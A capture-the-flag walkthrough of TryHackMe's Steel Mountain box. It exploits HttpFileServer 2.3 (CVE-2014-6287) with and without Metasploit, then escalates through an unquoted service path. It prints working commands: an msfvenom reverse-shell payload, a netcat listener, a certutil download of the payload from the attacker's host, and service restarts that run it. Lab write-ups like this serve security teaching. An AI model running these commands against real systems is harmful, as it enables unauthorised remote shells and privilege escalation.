TryHackMe Walkthrough: Steel Mountain (with &without Metasploit)
This room is a box hosting two web services, and one of them is hosting a vulnerable service. We are able to use an exploit to achieve remote code execution. After an initial shell, winPEAS shows we are able to use an unquoted service path vulnerability to escalate to nt authority\system.
This room can be completed with and without Metasploit. First, I will use Metasploit, then use public exploit code to recreate the same process.
You can find this room at https://tryhackme.com/room/steelmountain
First, we start with some recon. After running a basic nmap, we can see there are 12 ports open.
nmap -A -vv -oA reconbasic 10.10.22.135
After further review, we can also see there is a web server running on port 8080. After navigating to http://10.10.22.135:8080
, we can see it is running HttpFileServer 2.3
After a little research, HttpFileServer 2.3 is vulnerable to CVE-2014-6287
which is a remote code execution. This has a Metasploit module which we can leverage. After opening the msfconsole, we need to find and set up the exploit. First, search 2014–6287
to find the exploit. Then, use 0
to select the exploit.
Once the exploit is selected, we need to set up some options. Using the command options
we can get a list of what we need to change. In this case, we’ll need to change the RHOSTS
and RPORT
.
set RHOSTS 10.10.22.135
set RPORT 8080
Once the options are set, use the command run
and you should receive a meterpreter shell.
After a little bit of searching, we can find the user.txt flag at C:\Users\bill\Desktop\user.txt
Now that we have the initial shell, we need to find a way to escalate privileges. Using the meterpreter command upload /root/Desktop/PEASS/winPEAS/winPEASexe/winPEAS/bin/Obfuscated Releases/winPEASany.exe
we can upload winPEAS from our local machine to the remote machine. To run this script, we first need to use the command load powershell
then powershell_shell
to get into the PS shell. From there, we can use the command . .\WinPEASany.exe
to run the privilege escalation enumeration tool. After running winPEAS, we can find some paths to escalate. The creator of this box expected us to use the Advanced SystemCare Service unquoted paths vulnerability.
First, we need to understand what the unquoted path vulnerability is. An unquoted path vulnerability stems from a flaw in how the Microsoft API handles file paths while launching services. For example, if there is a service at C:\Program Files\Cool Service\Service.exe, Windows will attempt to launch the following services in this order because of the spacing. If it doesn’t exist, it will move on to the next one:
- C:\Program.exe
- C:\Program Files\Cool.exe
- C:\Program Files\Cool Service\Service.exe
More information can be found in Jeff Liford’s blog post: http://www.ryanandjeffshow.com/blog/2013/04/05/the-microsoft-windows-unquoted-service-path-vulnerability/
Now, to exploit this, we will need to use the path C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
Using the example above as a guide, we need to create a program at either of the following paths to run:
- C:\Program.exe
- C:\Program Files (x86)\IObit\Advanced.exe
This means we will have to put our Advanced.exe
file in C:\Program Files (x86)/IObit/
directory.
Using msfvenom, I generated a reverse shell and started a listener on port 4444.
msfvenom -p windows/reverse_tcp LHOST=10.10.182.72 LPORT=4444 -fexe -o Advanced.exe
nc -lvnp 4444
On the victim box, we need to stop the service, upload the shell, and start the service again. First, sc stop AdvancedSystemCareService9
.
Then, use the Meterpreter shell to upload /root/Advanced.exe
to the victim box.
Now, we need to start the service again using sc start AdvancedSystemCare9
in a normal shell. Once started, check your listener and you should have a shell opened as nt authority\system!
Now, a little searching and you can retrieve the root.txt
contents.
Without Metasploit
This box can be done without the use of Metasploit using the exploit code for the same CVE-2014–6287.
Using Searchsploit, we find that there is a Python RCE at and it can be copied to our path using the command searchsploit -m 39161.py
Now we have the exploit code. Looking at it, we need to do a few things to get set up.
- The usage shows we need to be running a web server hosting netcat. Kali has a copy of nc.exe in
/usr/share/windows-binaries
. Then we can host this by using python:python -m SimpleHTTPServer 80
- The code shows we need to change the local IP and the port we will be listening on:
Once these are changed, opened a listener, and we’re hosting nc.exe, we’re ready to go!
python 39161.py 10.10.0.27 8080
Now that we have the initial shell again, we will use the same unquoted service path vulnerability to escalate. Since we already know the vulnerability, we don’t need to rerun winPEAS. Using msfvenom, we can generate another Advanced.exe
shell(if necessary) and upload it using the python simple server.
msfvenom -p windows/reverse_tcp LHOST=10.10.182.72 LPORT=4444 -fexe -o Advanced.exe
Python -m SimpleHttpServer
Once we are hosting Advanced.exe, we need to use the certutil.exe service to get the file from our local system.
certutil.exe -urlcache -split -f http://10.10.182.72:8000/Advanced.exe
Now the Advanced.exe file is on the system, open another listener and then use the following commands to start and stop the service again to get the nt authority\system shell.
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9